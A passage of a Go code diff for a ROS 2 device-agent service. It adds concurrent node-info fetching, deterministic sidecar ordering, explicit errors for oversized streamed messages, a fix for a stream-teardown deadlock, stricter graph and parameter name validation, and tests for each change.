+		t.Errorf("GetGraph took %s for %d nodes; that is serial-shaped", elapsed, len(nodes))
+	}
+}
+
+func TestROS2Service_GetGraph_EdgesStayInListingOrder(t *testing.T) {
+	// Concurrency must not make the response order depend on scheduling.
+	nodes := []string{"/aaa", "/bbb", "/ccc", "/ddd", "/eee", "/fff", "/ggg", "/hhh", "/iii"}
+	rt := &countingRuntime{
+		sidecars: []ROS2Sidecar{{Name: "sc", Distro: "humble", DomainID: 7}},
+		nodes:    nodes,
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+
+	var first []string
+	for run := 0; run < 5; run++ {
+		resp, err := svc.GetGraph(context.Background(), &agentpbv2.GetROS2GraphRequest{})
+		if err != nil {
+			t.Fatalf("GetGraph: %v", err)
+		}
+		var order []string
+		for _, e := range resp.GetPublishes() {
+			order = append(order, e.GetNode())
+		}
+		if run == 0 {
+			first = order
+			if len(order) != len(nodes) {
+				t.Fatalf("got %d publish edges, want %d", len(order), len(nodes))
+			}
+			for i, n := range nodes {
+				if order[i] != n {
+					t.Fatalf("edge %d = %q, want %q (listing order)", i, order[i], n)
+				}
+			}
+			continue
+		}
+		if strings.Join(order, ",") != strings.Join(first, ",") {
+			t.Fatalf("run %d order %v differs from run 0 %v", run, order, first)
+		}
+	}
+}
+
+func TestROS2Service_SingleSidecarSkipsRoutingExec(t *testing.T) {
+	// The routing probe exists to choose between RMW graphs. With one sidecar
+	// there is nothing to choose, and the extra `topic list` exec doubled the
+	// latency of every targeted call.
+	rt := &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 7},
+		outputs: map[string]string{
+			"topic list":               "/chatter\n",
+			"param get /talker my_int": "Integer value is: 42\n",
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	if _, err := svc.GetParam(context.Background(), &agentpbv2.GetROS2ParamRequest{
+		Node: "/talker", Param: "my_int",
+	}); err != nil {
+		t.Fatalf("GetParam: %v", err)
+	}
+	for _, c := range rt.calls {
+		if strings.Join(c.Args, " ") == "node list" {
+			t.Fatal("GetParam ran a `node list` routing probe with only one sidecar")
+		}
+	}
+	if len(rt.calls) != 1 {
+		t.Errorf("made %d execs, want 1 (just the param get)", len(rt.calls))
+	}
+}
+
+func TestROS2Service_MultiSidecarStillRoutes(t *testing.T) {
+	// The short-circuit must not disable routing where it matters.
+	rt := twoSidecarRuntime(func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+		joined := strings.Join(opts.Args, " ")
+		switch {
+		case joined == "node list" && opts.SidecarName == "sc-fast":
+			_, _ = io.WriteString(stdout, "/talker\n")
+			return 0, nil
+		case joined == "node list":
+			_, _ = io.WriteString(stdout, "/other\n")
+			return 0, nil
+		case strings.HasPrefix(joined, "param get "):
+			if opts.SidecarName != "sc-fast" {
+				return 1, nil
+			}
+			_, _ = io.WriteString(stdout, "Integer value is: 42\n")
+			return 0, nil
+		}
+		return 1, nil
+	})
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	resp, err := svc.GetParam(context.Background(), &agentpbv2.GetROS2ParamRequest{
+		Node: "/talker", Param: "my_int",
+	})
+	if err != nil {
+		t.Fatalf("GetParam: %v", err)
+	}
+	if !strings.Contains(resp.GetValue(), "42") {
+		t.Errorf("value = %q, want the owning sidecar's answer", resp.GetValue())
+	}
+	sawRouting := false
+	for _, c := range rt.calls {
+		if strings.Join(c.Args, " ") == "node list" {
+			sawRouting = true
+		}
+	}
+	if !sawRouting {
+		t.Error("with two sidecars, GetParam must still probe for the owning graph")
+	}
+}
+
+func TestROS2Service_SidecarOrderIsDeterministic(t *testing.T) {
+	// `scs[0]` is the fallback for commands that cannot be RMW-routed (raw Exec,
+	// `bag record -a`). It used to inherit containerd's unspecified Containers()
+	// order; it is now sorted by sidecar name, so which DDS graph a raw
+	// passthrough lands on is a contract rather than an accident.
+	unsorted := []ROS2Sidecar{
+		{Name: "sc-zulu", Distro: "humble", DomainID: 1, RMW: "rmw_gurumdds_cpp"},
+		{Name: "sc-alpha", Distro: "humble", DomainID: 2, RMW: "rmw_cyclonedds_cpp"},
+		{Name: "sc-mike", Distro: "humble", DomainID: 3, RMW: "rmw_fastrtps_cpp"},
+	}
+	for run := 0; run < 5; run++ {
+		rt := &fakeROS2Runtime{
+			sidecars: unsorted,
+			outputs:  map[string]string{"doctor --report": "all good\n"},
+		}
+		svc := newTestROS2Service(t, rt, t.TempDir())
+		scs, err := svc.resolveSidecars(context.Background(), nil)
+		if err != nil {
+			t.Fatalf("resolveSidecars: %v", err)
+		}
+		want := []string{"sc-alpha", "sc-mike", "sc-zulu"}
+		for i, w := range want {
+			if scs[i].name != w {
+				t.Fatalf("run %d: sidecar %d = %q, want %q", run, i, scs[i].name, w)
+			}
+		}
+	}
+}
+
+func TestROS2Service_ExecFallsBackToTheLowestNamedSidecar(t *testing.T) {
+	// Raw passthrough can't be routed (opaque args), so it uses scs[0]. Pin which
+	// one that is.
+	rt := &fakeROS2Runtime{
+		sidecars: []ROS2Sidecar{
+			{Name: "sc-zulu", Distro: "humble", DomainID: 1},
+			{Name: "sc-alpha", Distro: "humble", DomainID: 2},
+		},
+		execFn: func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			_, _ = io.WriteString(stdout, "ran on "+opts.SidecarName+"\n")
+			return 0, nil
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2ExecOutput]{ctx: context.Background()}
+	if err := svc.Exec(&agentpbv2.ROS2ExecRequest{Args: []string{"pkg", "list"}}, stream); err != nil {
+		t.Fatalf("Exec: %v", err)
+	}
+	if len(rt.calls) == 0 {
+		t.Fatal("no exec recorded")
+	}
+	if rt.calls[0].SidecarName != "sc-alpha" {
+		t.Errorf("raw Exec ran on %q, want the deterministic first sidecar sc-alpha",
+			rt.calls[0].SidecarName)
+	}
+}

--- a/go/internal/agent/services/ros2_service.go
+++ b/go/internal/agent/services/ros2_service.go
@@ -5,6 +5,7 @@ import (
 	"bufio"
 	"bytes"
 	"context"
+	"errors"
 	"fmt"
 	"io"
 	"os"
@@ -32,6 +33,31 @@ var ros2BagNamePattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._-]*$`)
 
 // ros2BagChunkSize is the payload size for DownloadBag stream messages.
 const ros2BagChunkSize = 64 * 1024
+
+// Scanner token caps for the two streaming commands. Exceeding one is reported as
+// an error rather than an end-of-stream — see ros2ScanError.
+const (
+	// ros2EchoMaxMessageBytes bounds one `ros2 topic echo` YAML document. Large
+	// enough for a VGA Image or a modest PointCloud2; a full-res point cloud will
+	// exceed it, which is now an actionable error instead of silence.
+	ros2EchoMaxMessageBytes = 4 * 1024 * 1024
+	// ros2HzMaxLineBytes bounds one `ros2 topic hz` output line. The lines are
+	// tiny; the headroom is for a node that logs to stdout.
+	ros2HzMaxLineBytes = 1024 * 1024
+)
+
+// ros2ScanError turns a bufio.Scanner failure into a gRPC status. bufio.ErrTooLong
+// is the interesting case and gets ResourceExhausted with the cap named, because
+// the caller's only recourse is to echo a smaller topic (or use a field selector).
+func ros2ScanError(command, topic string, err error, cap int) error {
+	if errors.Is(err, bufio.ErrTooLong) {
+		return status.Errorf(codes.ResourceExhausted,
+			"ros2 %s %s: a single message exceeded the %d MiB streaming limit; "+
+				"echo a smaller topic or narrow it with a field selector",
+			command, topic, cap/(1024*1024))
+	}
+	return status.Errorf(codes.Internal, "ros2 %s %s: reading output: %v", command, topic, err)
+}
 
 // ROS2Service implements agentpbv2.ROS2ServiceServer by exec-ing `ros2`
 // commands inside the CLI sidecar managed by the ROS2Runtime (WDY-1332).
@@ -82,6 +108,12 @@ func (s *ROS2Service) resolveSidecars(ctx context.Context, override *int32) ([]r
 		}
 		out = append(out, ros2SC{name: sc.Name, rmw: sc.RMW, domainID: d})
 	}
+	// Sort by sidecar name so `scs[0]` — the fallback for commands that cannot be
+	// RMW-routed (raw Exec, `bag record -a`) — is actually deterministic. It used
+	// to inherit containerd's Containers() ordering, which containerd does not
+	// specify; in practice it is a bolt bucket walk, so the previous "first-running
+	// RMW deterministically wins" claim held by accident rather than by contract.
+	sort.Slice(out, func(i, j int) bool { return out[i].name < out[j].name })
 	return out, nil
 }
 
@@ -134,10 +166,21 @@ func (s *ROS2Service) runMerged(ctx context.Context, scs []ros2SC, args ...strin
 // topic/node/service lives in exactly one RMW graph). This avoids running the
 // command in the wrong sidecar — where a node/service-targeted call (param get,
 // service call) would block on DDS discovery until timeout before failing.
-// Falls back to the first sidecar when ownership can't be determined; if the
-// same name exists in more than one RMW graph (genuinely ambiguous), the
-// first-running RMW deterministically wins.
+// Falls back to the first sidecar (lowest name — see resolveSidecars) when
+// ownership can't be determined; if the same name exists in more than one RMW
+// graph (genuinely ambiguous), the lowest-named sidecar wins.
+//
+// Short-circuits when there is only one sidecar. Routing costs one extra
+// `ros2 <kind> list` exec per sidecar, and an exec is ~1s (container exec
+// dispatch + sourcing setup.bash + a fresh rclpy process doing DDS discovery).
+// On the overwhelmingly common single-RMW device that was a 100% overhead tax on
+// every targeted call — GetParam, SetParam, CallService, GetTopicInfo, every
+// lifecycle/component/action call, EchoTopic, MonitorHz, RecordBag — to choose
+// between one candidate.
 func (s *ROS2Service) pickSidecarOwning(ctx context.Context, scs []ros2SC, listKind, target string) ros2SC {
+	if len(scs) == 1 {
+		return scs[0]
+	}
 	for _, sc := range scs {
 		out, err := s.runIn(ctx, sc, listKind, "list")
 		if err != nil {
@@ -186,7 +229,12 @@ func (s *ROS2Service) ListNodes(ctx context.Context, req *agentpbv2.ListROS2Node
 	for _, o := range outs {
 		for _, n := range parseROS2NodeList(o.out) {
 			n.Rmw = o.rmw
-			key := n.GetNamespace() + "/" + n.GetName() + "\x00" + o.rmw
+			// ros2NodeFQN, not manual concatenation: the hand-rolled version
+			// produced "//talker" for a root-namespace node while every other
+			// dedup site used ros2NodeFQN's "/talker". Harmless as long as it was
+			// only ever a map key, but two spellings of the same identity is how
+			// a real dedup bug gets introduced later.
+			key := ros2NodeFQN(n) + "\x00" + o.rmw
 			if seen[key] {
 				continue
 			}
@@ -429,31 +477,35 @@ func (s *ROS2Service) GetGraph(ctx context.Context, req *agentpbv2.GetROS2GraphR
 			continue
 		}
 		any = true
-		for _, node := range parseROS2NodeList(out) {
+		nodes := parseROS2NodeList(out)
+		for _, node := range nodes {
 			node.Rmw = sc.rmw
-			fqn := ros2NodeFQN(node)
-			nodeKey := fqn + "\x00" + sc.rmw
+			nodeKey := ros2NodeFQN(node) + "\x00" + sc.rmw
 			if !seenNodes[nodeKey] {
 				seenNodes[nodeKey] = true
 				resp.Nodes = append(resp.Nodes, node)
 			}
-			info, ierr := s.runIn(ctx, sc, "node", "info", fqn)
-			if ierr != nil {
+		}
+		// `node info` per node used to run serially. Each exec is ~1s (see
+		// ros2TopicInfoConcurrency), so a 40-node robot took 40s+ to answer one
+		// `wendy device ros2 graph`. Fan out with the same bound ListTopics uses,
+		// then fold results in listing order so the response stays deterministic.
+		for _, r := range s.fetchROS2NodeInfo(ctx, sc, nodes) {
+			if !r.ok {
 				continue // node may have exited between list and info
 			}
-			publishes, subscribes := parseROS2NodeInfo(info)
-			for _, topic := range publishes {
-				edgeKey := fqn + "\x00" + topic + "\x00" + sc.rmw + "\x00pub"
+			for _, topic := range r.publishes {
+				edgeKey := r.fqn + "\x00" + topic + "\x00" + sc.rmw + "\x00pub"
 				if !seenEdges[edgeKey] {
 					seenEdges[edgeKey] = true
-					resp.Publishes = append(resp.Publishes, &agentpbv2.GetROS2GraphResponse_Edge{Node: fqn, Topic: topic, Rmw: sc.rmw})
+					resp.Publishes = append(resp.Publishes, &agentpbv2.GetROS2GraphResponse_Edge{Node: r.fqn, Topic: topic, Rmw: sc.rmw})
 				}
 			}
-			for _, topic := range subscribes {
-				edgeKey := fqn + "\x00" + topic + "\x00" + sc.rmw + "\x00sub"
+			for _, topic := range r.subscribes {
+				edgeKey := r.fqn + "\x00" + topic + "\x00" + sc.rmw + "\x00sub"
 				if !seenEdges[edgeKey] {
 					seenEdges[edgeKey] = true
-					resp.Subscribes = append(resp.Subscribes, &agentpbv2.GetROS2GraphResponse_Edge{Node: fqn, Topic: topic, Rmw: sc.rmw})
+					resp.Subscribes = append(resp.Subscribes, &agentpbv2.GetROS2GraphResponse_Edge{Node: r.fqn, Topic: topic, Rmw: sc.rmw})
 				}
 			}
 		}
@@ -462,6 +514,45 @@ func (s *ROS2Service) GetGraph(ctx context.Context, req *agentpbv2.GetROS2GraphR
 		return nil, lastErr
 	}
 	return resp, nil
+}
+
+// ros2NodeInfoResult is one node's parsed `node info`, carrying its index so the
+// concurrent fan-out can be folded back in deterministic listing order.
+type ros2NodeInfoResult struct {
+	fqn        string
+	publishes  []string
+	subscribes []string
+	ok         bool
+}
+
+// fetchROS2NodeInfo runs `ros2 node info <fqn>` for every node concurrently,
+// bounded by ros2TopicInfoConcurrency, and returns results in `nodes` order.
+func (s *ROS2Service) fetchROS2NodeInfo(ctx context.Context, sc ros2SC, nodes []*agentpbv2.ROS2Node) []ros2NodeInfoResult {
+	results := make([]ros2NodeInfoResult, len(nodes))
+	sem := make(chan struct{}, ros2TopicInfoConcurrency)
+	var wg sync.WaitGroup
+LOOP:
+	for i, node := range nodes {
+		select {
+		case sem <- struct{}{}:
+		case <-ctx.Done():
+			break LOOP
+		}
+		wg.Add(1)
+		go func(i int, fqn string) {
+			defer wg.Done()
+			defer func() { <-sem }()
+			results[i].fqn = fqn
+			info, ierr := s.runIn(ctx, sc, "node", "info", fqn)
+			if ierr != nil {
+				return
+			}
+			results[i].publishes, results[i].subscribes = parseROS2NodeInfo(info)
+			results[i].ok = true
+		}(i, ros2NodeFQN(node))
+	}
+	wg.Wait()
+	return results
 }
 
 func (s *ROS2Service) Doctor(ctx context.Context, req *agentpbv2.ROS2DoctorRequest) (*agentpbv2.ROS2DoctorResponse, error) {
@@ -533,11 +624,24 @@ func (s *ROS2Service) EchoTopic(req *agentpbv2.EchoROS2TopicRequest, stream grpc
 		execDone <- execErr
 	}()
 
+	// Release the exec goroutine and wait for it. Cancelling alone is NOT enough:
+	// the goroutine can be blocked mid-Write into pw, so the read end has to be
+	// drained and closed or <-execDone wedges forever (WDY-1698). Every exit path
+	// goes through here — including the scanner-error path, which previously did
+	// not and deadlocked the whole RPC (holding one of the sidecar's 16 exec slots
+	// indefinitely) whenever a message exceeded the token cap.
+	drainAndWait := func() error {
+		cancel()
+		go func() { _, _ = io.Copy(io.Discard, pr) }()
+		pr.CloseWithError(context.Canceled)
+		return <-execDone
+	}
+
 	// `ros2 topic echo` separates YAML documents with bare "---" lines.
 	var doc strings.Builder
 	sent := int32(0)
 	scanner := bufio.NewScanner(pr)
-	scanner.Buffer(make([]byte, 0, 64*1024), 4*1024*1024)
+	scanner.Buffer(make([]byte, 0, 64*1024), ros2EchoMaxMessageBytes)
 	for scanner.Scan() {
 		line := scanner.Text()
 		if strings.TrimSpace(line) != "---" {
@@ -549,28 +653,28 @@ func (s *ROS2Service) EchoTopic(req *agentpbv2.EchoROS2TopicRequest, stream grpc
 			continue
 		}
 		if serr := stream.Send(&agentpbv2.ROS2Message{Topic: req.GetTopic(), Yaml: doc.String()}); serr != nil {
-			cancel()
-			go func() { _, _ = io.Copy(io.Discard, pr) }()
-			pr.CloseWithError(context.Canceled)
-			<-execDone
+			_ = drainAndWait()
 			return serr
 		}
 		doc.Reset()
 		sent++
 		if req.GetCount() > 0 && sent >= req.GetCount() {
-			cancel()
-			// Drain anything the publisher writes after cancel so a goroutine
-			// blocked mid-Write into pw is released and <-execDone can't wedge
-			// (WDY-1698). CloseWithError alone races a write already in progress.
-			go func() { _, _ = io.Copy(io.Discard, pr) }()
-			pr.CloseWithError(context.Canceled)
-			<-execDone
+			_ = drainAndWait()
 			return nil
 		}
 	}
-	execErr := <-execDone
+	// scanner.Err() must be checked before treating loop exit as end-of-stream. A
+	// single YAML document over the token cap — a PointCloud2, an Image, an
+	// occupancy grid — ends Scan() with bufio.ErrTooLong while execErr stays nil,
+	// so this used to return nil and the client saw a clean EOF with no output and
+	// no error: silent truncation on exactly the topics echo exists to inspect.
+	scanErr := scanner.Err()
+	execErr := drainAndWait()
 	if ctx.Err() != nil {
 		return nil // client cancelled; not an error
+	}
+	if scanErr != nil {
+		return ros2ScanError("topic echo", req.GetTopic(), scanErr, ros2EchoMaxMessageBytes)
 	}
 	if execErr != nil {
 		return status.Errorf(codes.Internal, "ros2 topic echo: %v", execErr)
@@ -604,8 +708,20 @@ func (s *ROS2Service) MonitorHz(req *agentpbv2.MonitorROS2HzRequest, stream grpc
 		execDone <- execErr
 	}()
 
+	// Same teardown contract as EchoTopic: cancel, drain, close, then wait.
+	// Cancelling without draining left the exec goroutine blocked mid-Write.
+	drainAndWait := func() error {
+		cancel()
+		go func() { _, _ = io.Copy(io.Discard, pr) }()
+		pr.CloseWithError(context.Canceled)
+		return <-execDone
+	}
+
 	var avgLine string
 	scanner := bufio.NewScanner(pr)
+	// `ros2 topic hz` lines are short, but a node logging to stdout is not, and
+	// the default 64 KiB cap turned that into a silently-ended stream.
+	scanner.Buffer(make([]byte, 0, 64*1024), ros2HzMaxLineBytes)
 	for scanner.Scan() {
 		line := scanner.Text()
 		if strings.Contains(line, "average rate:") {
@@ -621,14 +737,17 @@ func (s *ROS2Service) MonitorHz(req *agentpbv2.MonitorROS2HzRequest, stream grpc
 			continue
 		}
 		if serr := stream.Send(sample); serr != nil {
-			cancel()
-			<-execDone
+			_ = drainAndWait()
 			return serr
 		}
 	}
-	execErr := <-execDone
+	scanErr := scanner.Err()
+	execErr := drainAndWait()
 	if ctx.Err() != nil {
 		return nil
+	}
+	if scanErr != nil {
+		return ros2ScanError("topic hz", req.GetTopic(), scanErr, ros2HzMaxLineBytes)
 	}
 	if execErr != nil {
 		return status.Errorf(codes.Internal, "ros2 topic hz: %v", execErr)
@@ -1215,11 +1334,17 @@ func (s *ROS2Service) UnloadComponent(ctx context.Context, req *agentpbv2.Unload
 }
 
 // validateROS2GraphName accepts ROS 2 graph names (topics, nodes, services):
-// slash-separated identifiers, optionally with a leading slash or ~. The
+// slash-separated identifiers, optionally with a leading slash or `~/`. The
 // character set excludes whitespace and shell metacharacters, providing
 // defence-in-depth on top of the sidecar's no-shell-interpretation exec
 // (SOC2-CC6, ISO27001-A.8, NIST-SI-10).
-var ros2GraphNamePattern = regexp.MustCompile(`^~?/?[a-zA-Z0-9_][a-zA-Z0-9_/]*$`)
+//
+// Each segment must start with a letter or underscore (hidden topics start with
+// `_`) and may then contain letters, digits and underscores — which is ROS 2's
+// own rule. The previous pattern (`^~?/?[a-zA-Z0-9_][a-zA-Z0-9_/]*$`) let through
+// `//foo`, `/foo/` and `/1camera`: all illegal ROS 2 names that were forwarded to
+// the CLI and came back as an rclpy traceback rather than an InvalidArgument.
+var ros2GraphNamePattern = regexp.MustCompile(`^(~/|/)?[a-zA-Z_][a-zA-Z0-9_]*(/[a-zA-Z_][a-zA-Z0-9_]*)*$`)
 
 func validateROS2GraphName(name string) error {
 	if name == "" {
@@ -1232,8 +1357,11 @@ func validateROS2GraphName(name string) error {
 }
 
 // validateROS2ParamName accepts ROS 2 parameter names, which use dots as
-// hierarchy separators (e.g. "robot.wheel.radius").
-var ros2ParamNamePattern = regexp.MustCompile(`^[a-zA-Z0-9_][a-zA-Z0-9_.]*$`)
+// hierarchy separators (e.g. "robot.wheel.radius"). Each dot-separated segment
+// follows the same identifier rule as a graph-name segment, so a leading digit,
+// a trailing dot, or an empty segment (`a..b`) is rejected rather than passed to
+// the CLI.
+var ros2ParamNamePattern = regexp.MustCompile(`^[a-zA-Z_][a-zA-Z0-9_]*(\.[a-zA-Z_][a-zA-Z0-9_]*)*$`)
 
 func validateROS2ParamName(name string) error {
 	if name == "" {

--- a/go/internal/agent/services/ros2_service_test.go
+++ b/go/internal/agent/services/ros2_service_test.go
@@ -427,10 +427,17 @@ type fakeServerStream[T any] struct {
 	grpc.ServerStream
 	ctx  context.Context
 	sent []*T
+	// onSend, when set, runs after each Send with the new message count. Lets a
+	// test react to the stream mid-flight (e.g. cancel the client after the
+	// first message).
+	onSend func(count int) error
 }
 
 func (f *fakeServerStream[T]) Send(msg *T) error {
 	f.sent = append(f.sent, msg)
+	if f.onSend != nil {
+		return f.onSend(len(f.sent))
+	}
 	return nil
 }
 

--- a/go/internal/agent/services/ros2_stream_test.go
+++ b/go/internal/agent/services/ros2_stream_test.go
@@ -1,0 +1,257 @@
+package services
+
+import (
+	"context"
+	"io"
+	"strings"
+	"testing"
+	"time"
+
+	"google.golang.org/grpc/codes"
+	"google.golang.org/grpc/status"
+
+	agentpbv2 "github.com/wendylabsinc/wendy/go/proto/gen/agentpb/v2"
+)
+
+// ros2StreamTestTimeout bounds each streaming test. The bug these cover was not
+// only "returns nil silently" — it deadlocked: the scanner stopped consuming, the
+// exec goroutine blocked mid-Write into the pipe, and <-execDone never returned.
+// Without an explicit bound a regression burns the whole `go test` timeout and
+// reports as an unrelated package-level failure.
+const ros2StreamTestTimeout = 30 * time.Second
+
+// withDeadline runs fn and fails the test if it has not returned in time, so a
+// hang is reported as a hang, at the right test, immediately.
+func withDeadline(t *testing.T, fn func() error) error {
+	t.Helper()
+	done := make(chan error, 1)
+	go func() { done <- fn() }()
+	select {
+	case err := <-done:
+		return err
+	case <-time.After(ros2StreamTestTimeout):
+		t.Fatalf("timed out after %s: the RPC did not return (deadlock?)", ros2StreamTestTimeout)
+		return nil
+	}
+}
+
+// EchoTopic scans `ros2 topic echo` output with a bufio.Scanner capped at 4 MiB
+// and never checked scanner.Err(). A single YAML document over the cap — a
+// PointCloud2, a sensor_msgs/Image, an occupancy grid, i.e. exactly the topics
+// people reach for echo to inspect — made Scan() return false with
+// bufio.ErrTooLong. execErr was nil, so EchoTopic returned nil, the CLI saw a
+// clean EOF, and the user got exit 0 with no output and no error (or worse, the
+// "no active publishers" notice, which is a lie).
+
+// echoRuntime streams the given stdout payload for `topic echo`, and answers the
+// `topic list` that routing uses.
+func echoRuntime(topic, payload string) *fakeROS2Runtime {
+	return &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 5},
+		execFn: func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			switch strings.Join(opts.Args, " ") {
+			case "topic list":
+				_, _ = io.WriteString(stdout, topic+"\n")
+				return 0, nil
+			case "topic echo " + topic:
+				_, _ = io.WriteString(stdout, payload)
+				return 0, nil
+			}
+			return 1, nil
+		},
+	}
+}
+
+func TestROS2Service_EchoTopic_OversizedMessageIsAnError(t *testing.T) {
+	// One YAML document larger than the scanner's token cap, on a single line —
+	// which is how a big base64/uint8[] field arrives.
+	huge := strings.Repeat("x", 5*1024*1024)
+	payload := "data: " + huge + "\n---\n"
+
+	rt := echoRuntime("/camera/points", payload)
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2Message]{ctx: context.Background()}
+
+	err := withDeadline(t, func() error {
+		return svc.EchoTopic(&agentpbv2.EchoROS2TopicRequest{Topic: "/camera/points"}, stream)
+	})
+	if err == nil {
+		t.Fatal("EchoTopic returned nil for an oversized message; the client cannot " +
+			"distinguish that from a topic with no publishers")
+	}
+	if got := status.Code(err); got != codes.ResourceExhausted {
+		t.Errorf("status code = %v, want ResourceExhausted (err: %v)", got, err)
+	}
+	if !strings.Contains(err.Error(), "/camera/points") {
+		t.Errorf("error should name the topic, got: %v", err)
+	}
+	if len(stream.sent) != 0 {
+		t.Errorf("sent %d messages, want 0 (the document never completed)", len(stream.sent))
+	}
+}
+
+func TestROS2Service_EchoTopic_NormalSizedMessagesStillStream(t *testing.T) {
+	payload := "data: hello\n---\ndata: world\n---\n"
+	rt := echoRuntime("/chatter", payload)
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2Message]{ctx: context.Background()}
+
+	if err := withDeadline(t, func() error {
+		return svc.EchoTopic(&agentpbv2.EchoROS2TopicRequest{Topic: "/chatter"}, stream)
+	}); err != nil {
+		t.Fatalf("EchoTopic: %v", err)
+	}
+	if len(stream.sent) != 2 {
+		t.Fatalf("sent %d messages, want 2", len(stream.sent))
+	}
+	if got := stream.sent[0].GetYaml(); got != "data: hello\n" {
+		t.Errorf("first message = %q", got)
+	}
+}
+
+// A message just under the cap must still get through, so the fix is a real error
+// path and not a lowered ceiling.
+func TestROS2Service_EchoTopic_LargeButUnderCapSucceeds(t *testing.T) {
+	body := strings.Repeat("y", 3*1024*1024)
+	payload := "data: " + body + "\n---\n"
+	rt := echoRuntime("/big", payload)
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2Message]{ctx: context.Background()}
+
+	if err := withDeadline(t, func() error {
+		return svc.EchoTopic(&agentpbv2.EchoROS2TopicRequest{Topic: "/big"}, stream)
+	}); err != nil {
+		t.Fatalf("EchoTopic: %v", err)
+	}
+	if len(stream.sent) != 1 {
+		t.Fatalf("sent %d messages, want 1", len(stream.sent))
+	}
+}
+
+// MonitorHz used the default 64 KiB scanner buffer, so a node logging a longer
+// line to stdout silently ended the stream as if the topic had stopped
+// publishing. The cap is now ros2HzMaxLineBytes and exceeding it is an error.
+func TestROS2Service_MonitorHz_LongLineUnderNewCapStillStreams(t *testing.T) {
+	// 128 KiB: over the old 64 KiB default, under the new cap. This is the case
+	// that used to break in practice.
+	long := strings.Repeat("z", 128*1024)
+	payload := "average rate: 10.000\n\tmin: 0.099s max: 0.101s std dev: 0.00050s window: 11\n" +
+		long + "\n"
+	rt := &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 5},
+		execFn: func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			switch strings.Join(opts.Args, " ") {
+			case "topic list":
+				_, _ = io.WriteString(stdout, "/chatter\n")
+				return 0, nil
+			case "topic hz /chatter":
+				_, _ = io.WriteString(stdout, payload)
+				return 0, nil
+			}
+			return 1, nil
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2HzSample]{ctx: context.Background()}
+	if err := withDeadline(t, func() error {
+		return svc.MonitorHz(&agentpbv2.MonitorROS2HzRequest{Topic: "/chatter"}, stream)
+	}); err != nil {
+		t.Fatalf("a 128 KiB line is under the cap and must not fail: %v", err)
+	}
+	if len(stream.sent) != 1 {
+		t.Fatalf("sent %d samples, want 1", len(stream.sent))
+	}
+}
+
+func TestROS2Service_MonitorHz_OversizedLineIsAnError(t *testing.T) {
+	// Past the cap: must be an explicit error, not a silently-ended stream.
+	long := strings.Repeat("z", ros2HzMaxLineBytes+1024)
+	payload := "average rate: 10.000\n" + long + "\n"
+	rt := &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 5},
+		execFn: func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			switch strings.Join(opts.Args, " ") {
+			case "topic list":
+				_, _ = io.WriteString(stdout, "/chatter\n")
+				return 0, nil
+			case "topic hz /chatter":
+				_, _ = io.WriteString(stdout, payload)
+				return 0, nil
+			}
+			return 1, nil
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2HzSample]{ctx: context.Background()}
+
+	err := withDeadline(t, func() error {
+		return svc.MonitorHz(&agentpbv2.MonitorROS2HzRequest{Topic: "/chatter"}, stream)
+	})
+	if err == nil {
+		t.Fatal("MonitorHz returned nil after a scanner error")
+	}
+	if got := status.Code(err); got != codes.ResourceExhausted {
+		t.Errorf("status code = %v, want ResourceExhausted (err: %v)", got, err)
+	}
+}
+
+func TestROS2Service_MonitorHz_NormalOutputStillStreams(t *testing.T) {
+	payload := "average rate: 10.000\n\tmin: 0.099s max: 0.101s std dev: 0.00050s window: 11\n"
+	rt := &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 5},
+		execFn: func(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			switch strings.Join(opts.Args, " ") {
+			case "topic list":
+				_, _ = io.WriteString(stdout, "/chatter\n")
+				return 0, nil
+			case "topic hz /chatter":
+				_, _ = io.WriteString(stdout, payload)
+				return 0, nil
+			}
+			return 1, nil
+		},
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+	stream := &fakeServerStream[agentpbv2.ROS2HzSample]{ctx: context.Background()}
+	if err := withDeadline(t, func() error {
+		return svc.MonitorHz(&agentpbv2.MonitorROS2HzRequest{Topic: "/chatter"}, stream)
+	}); err != nil {
+		t.Fatalf("MonitorHz: %v", err)
+	}
+	if len(stream.sent) != 1 {
+		t.Fatalf("sent %d samples, want 1", len(stream.sent))
+	}
+	if stream.sent[0].GetHz() != 10.0 {
+		t.Errorf("hz = %v, want 10", stream.sent[0].GetHz())
+	}
+}
+
+// A client that goes away mid-stream is not an error, and must stay that way.
+func TestROS2Service_EchoTopic_ClientCancelIsNotAnError(t *testing.T) {
+	ctx, cancel := context.WithCancel(context.Background())
+	rt := &fakeROS2Runtime{
+		sidecar: ROS2Sidecar{Name: "sc", Distro: "humble", DomainID: 5},
+		execFn: func(ectx context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+			if strings.Join(opts.Args, " ") == "topic list" {
+				_, _ = io.WriteString(stdout, "/chatter\n")
+				return 0, nil
+			}
+			_, _ = io.WriteString(stdout, "data: a\n---\n")
+			<-ectx.Done()
